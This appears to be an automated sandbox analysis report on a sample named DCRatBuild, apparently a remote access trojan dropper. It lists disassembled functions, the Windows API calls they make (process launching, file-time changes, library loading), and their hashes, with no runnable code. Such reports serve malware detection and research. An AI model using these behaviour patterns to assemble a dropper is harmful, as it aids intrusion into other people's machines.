GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 008E9EFC
GlobalUnlock.KERNEL32(00000000), ref: 008E9F1B
GlobalFree.KERNEL32(00000000), ref: 008E9F22

Strings

PNG, xrefs: 008E9E1F

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: f542b82c1a378323a9fb652c9ef4ed34982efa3b4321c817d036aa4afcb910ca
Instruction ID: ac9451dcc23334fd28bf728f78bbb8a99b9a465f302a71c66fd55f698a09a7ac
Opcode Fuzzy Hash: f542b82c1a378323a9fb652c9ef4ed34982efa3b4321c817d036aa4afcb910ca
Instruction Fuzzy Hash: EC31847121C346AFC7109F67EC4896BBBADFF8A755B048518F942D2260EBB1DC00DB61

Function 008ECE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 008ECF54
ShowWindow.USER32(?,00000000), ref: 008ECF93
GetExitCodeProcess.KERNEL32(?,?), ref: 008ECFCF
CloseHandle.KERNEL32(?), ref: 008ECFF5
ShowWindow.USER32(?,00000001), ref: 008ED084

Part of subcall function 008E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008DBB05,00000000,.exe,?,?,00000800,?,?,008E85DF,?), ref: 008E17C2

Strings

.exe, xrefs: 008ECFFF
, xrefs: 008ECEA2
.inf, xrefs: 008ECF10

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 1a3d26effe68dc574d4c5b2e0abc1eba35a10a4a3e6cf7ca8ca83b86f014fb38
Instruction ID: 7e0985f0dba3e9e620406e7340282a740bb163c03695b98f7b37498994a6fbaf
Opcode Fuzzy Hash: 1a3d26effe68dc574d4c5b2e0abc1eba35a10a4a3e6cf7ca8ca83b86f014fb38
Instruction Fuzzy Hash: 1461F5719187C19AD731DF66D8046AB7BEAFF83304F088819F5C1D7250DBB1898ADB52

Function 008FA058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008F4E35,008F4E35,?,?,?,008FA2A9,00000001,00000001,3FE85006), ref: 008FA0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008FA2A9,00000001,00000001,3FE85006,?,?,?), ref: 008FA138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008FA232
__freea.LIBCMT ref: 008FA23F

Part of subcall function 008F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008FC13D,00000000,?,008F67E2,?,00000008,?,008F89AD,?,?,?), ref: 008F854A

__freea.LIBCMT ref: 008FA248
__freea.LIBCMT ref: 008FA26D

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 43d6cde86ef1a29b2168aa49facb7c60e9852cb22c304c72a24a42a85a8ff94e
Instruction ID: 8f0edcce8201b7741997e7ccfb72ba9c8766b94295d7ec89c656f5206c6a2d0f
Opcode Fuzzy Hash: 43d6cde86ef1a29b2168aa49facb7c60e9852cb22c304c72a24a42a85a8ff94e
Instruction Fuzzy Hash: 3A51CFB271021AAFEB298F74CC41EBB77A9FB44770F154228FE09D6141EB35DC5086A2

Function 008EA335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008E00A0
Part of subcall function 008E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008DEB86,Crypt32.dll,00000000,008DEC0A,?,?,008DEBEC,?,?,?), ref: 008E00C2

OleInitialize.OLE32(00000000), ref: 008EA34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 008EA385
SHGetMalloc.SHELL32(00918430), ref: 008EA38F

Strings

3To, xrefs: 008EA366
riched20.dll, xrefs: 008EA33D

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3To
API String ID: 3498096277-2168385784
Opcode ID: 55c1829269ed5e41b615128fe54e1a3f3eba3b34275b34b4dd440837ed25ec61
Instruction ID: a7416e752b4ebb677715dba336240cd5c468bc12d280f1620c47bc1e50019cd4
Opcode Fuzzy Hash: 55c1829269ed5e41b615128fe54e1a3f3eba3b34275b34b4dd440837ed25ec61
Instruction Fuzzy Hash: 61F049B1D0420EABCB10AF9AD8499EFFBFCEF95305F00415AE914E2240DBB446499FA1

Function 008D99B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,008D78AD,?,00000005,?,00000011), ref: 008D9A4C
GetLastError.KERNEL32(?,?,008D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008D9A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,008D78AD,?,00000005,?), ref: 008D9A8E
GetLastError.KERNEL32(?,?,008D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008D9A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008D78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008D9ADB

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 358c17e2ca83369693dbfb0bb9595ffd2da4c522f1e3098d25a77e75c94d49ba
Instruction ID: a292924fb3e09453551bb409c064f3dffedba3d5db3247885b174a7e76f31baa
Opcode Fuzzy Hash: 358c17e2ca83369693dbfb0bb9595ffd2da4c522f1e3098d25a77e75c94d49ba
Instruction Fuzzy Hash: 1A4146315487566FE3209B24CC05BDABBE4FB05324F10071BF5E4D62D1E775A988CB92

Function 008EA2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 008EA2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 008EA315

Part of subcall function 008E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008DBB05,00000000,.exe,?,?,00000800,?,?,008E85DF,?), ref: 008E17C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 008EA305

Strings

EDIT, xrefs: 008EA2E9, 008EA2F4, 008EA301

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: af0663355d2d3f94ea01b656b8b9666a925f848d7b719ec2af622922cee89a74
Instruction ID: ae7b2724b32b25839e22bfb6267d5a2c32c042c0245935641fa718a78eb2b9e2
Opcode Fuzzy Hash: af0663355d2d3f94ea01b656b8b9666a925f848d7b719ec2af622922cee89a74
Instruction Fuzzy Hash: 86F0E232A052287BE7305765AC49F9B73ACEF47F00F040052BE04E7280D760A945CAF6

Function 008ED287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 008ED29D
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 008ED2D9

Strings

sfxcmd, xrefs: 008ED298
sfxpar, xrefs: 008ED2D4

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 1997a21ab0103160ef385025670d3937f277f15849d71eb3df3bbc5efb6fabe0
Instruction ID: 4f522beb7b536fcf899fec0f467a2cab897d6e2bd8f0a8bc370318c098a622e8
Opcode Fuzzy Hash: 1997a21ab0103160ef385025670d3937f277f15849d71eb3df3bbc5efb6fabe0
Instruction Fuzzy Hash: 81F0A771815328FAD7206F959C09ABE776CFF0AB55B004112FE89D6241D660DD40EAF1

Function 008D984E Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 008D985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 008D9876
GetLastError.KERNEL32 ref: 008D98A8
GetLastError.KERNEL32 ref: 008D98C7

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 509e8d868013603a8f017c13eb96b2dfc0f952385fb221e3965be3fe949aadb4
Instruction ID: 45fa11183c510de8536c24d49cbfbc7a864213da266f7e8cd877f80cb8393f32
Opcode Fuzzy Hash: 509e8d868013603a8f017c13eb96b2dfc0f952385fb221e3965be3fe949aadb4
Instruction Fuzzy Hash: F8115A30904208EFDB205A55C804A797BADFB06B35F10C73BE8AAC6B90D7759E40BB52

Function 008FA4F4 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,008F3713,00000000,00000000,?,008FA49B,008F3713,00000000,00000000,00000000,?,008FA698,00000006,FlsSetValue), ref: 008FA526
GetLastError.KERNEL32(?,008FA49B,008F3713,00000000,00000000,00000000,?,008FA698,00000006,FlsSetValue,00907348,00907350,00000000,00000364,?,008F9077), ref: 008FA532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008FA49B,008F3713,00000000,00000000,00000000,?,008FA698,00000006,FlsSetValue,00907348,00907350,00000000), ref: 008FA540

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 10d497f8e106dbfd948ccd6bc653a088156dd3984353f08cc345d556419ccc8f
Instruction ID: fc1a140dc3a41ef77c3e9d06ed8a6265c135a40ca0bf54aad4f20bfe2804e388
Opcode Fuzzy Hash: 10d497f8e106dbfd948ccd6bc653a088156dd3984353f08cc345d556419ccc8f
Instruction Fuzzy Hash: 2C01FC7662922AAFC7258BF89C44A76775CFF49BB17104520FA0ED7240D721D900D6E1

Function 008D9F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,008DCC94,00000001,?,?,?,00000000,008E4ECD,?,?,?), ref: 008D9F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,008E4ECD,?,?,?,?,?,008E4972,?), ref: 008D9F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,008DCC94,00000001,?,?), ref: 008D9FB8

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: dc25b265546c367b39e5cb0ac9d99f45f0890a10c9c19c55ece44849bf761330
Instruction ID: fddc8e199c7cd733bb6fcf14314dc5061284cd72c6a937f9f82c90586a98eb25
Opcode Fuzzy Hash: dc25b265546c367b39e5cb0ac9d99f45f0890a10c9c19c55ece44849bf761330
Instruction Fuzzy Hash: 7F31D2712083059BDB149F14D84876ABBA8FB90710F04875AF985DA381CB75DD48CBA2

Function 008DA207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA261
GetLastError.KERNEL32(?,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA27E

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 60b77901a217df5f07fa637570b9b029b3a2adb008b3250a59b7744c12c9f4ad
Instruction ID: 7773a45823328d75fcf8f5cf3fe0affd4e68b04c2b784af9b85ca80641e0584a
Opcode Fuzzy Hash: 60b77901a217df5f07fa637570b9b029b3a2adb008b3250a59b7744c12c9f4ad
Instruction Fuzzy Hash: B601F531191218A6DF3AABBA8C05BEE335DFF07751F244657F801E6251CB66CA40C6B3

Function 008FAFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 008FB019

Strings

, xrefs: 008FB05E

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 9cc3a866d0a340329feae2c48db7a7354517aaa498fb180cfebda56f21d5d0ed
Instruction ID: 7bd9ede639fdf9a6da2b29d1e69fdebda39b60b54290c01bb106f0a82393d33a
Opcode Fuzzy Hash: 9cc3a866d0a340329feae2c48db7a7354517aaa498fb180cfebda56f21d5d0ed
Instruction Fuzzy Hash: 3541097050474C9ADF268A34CC94AF7BBAEFB45308F1404EDE69AC7142E7359A85DF60

Function 008FA72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 008FA79D

Strings

LCMapStringEx, xrefs: 008FA73D, 008FA747

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 82642b75c40108b272558581f1ac6793e691c001438703cce3ec46964381cba6
Instruction ID: 2839b33a1494ee8612ba658c8194b815fc53733d647df9e913f26760740a6e2e
Opcode Fuzzy Hash: 82642b75c40108b272558581f1ac6793e691c001438703cce3ec46964381cba6
Instruction Fuzzy Hash: 6901027250420CBFCF166FA4EC01DAE7F66FB48760F048114FE1866160DA329961EB92

Function 008FA6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,008F9D2F), ref: 008FA715

Strings

InitializeCriticalSectionEx, xrefs: 008FA6E5

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: b0680c18bf7fda14e3fe4c5f7cdab9bcf62ed274387d4fe4a45cb9733fa37785
Instruction ID: 113e78802849c25d451a35a761967107852ed256c7e4c8cea4333dc1708cabc4
Opcode Fuzzy Hash: b0680c18bf7fda14e3fe4c5f7cdab9bcf62ed274387d4fe4a45cb9733fa37785
Instruction Fuzzy Hash: 96F0BE71A5921CBFCB196F64DC05CAEBF65FF48B30B008054FD099A2A0DA725A10FBA1

Function 008FA56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 008FA5AE

Strings

FlsAlloc, xrefs: 008FA58A

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: d17d09e80f681a289d9a1f0b4d5faa24ff63206bd0ac23748b3d7f08813bae11
Instruction ID: 7dd017c486abd4d6db728b59c4f1f404aac842b4871cd60087d0d07b2cc39ef0
Opcode Fuzzy Hash: d17d09e80f681a289d9a1f0b4d5faa24ff63206bd0ac23748b3d7f08813bae11
Instruction Fuzzy Hash: 81E055B0B5922C6FD2186BA8AC028BEBB54EB69B30B014114FC0897280CD711E00B6E6

Function 008F329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 008F32AF

Strings

FlsAlloc, xrefs: 008F329E, 008F32A8

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
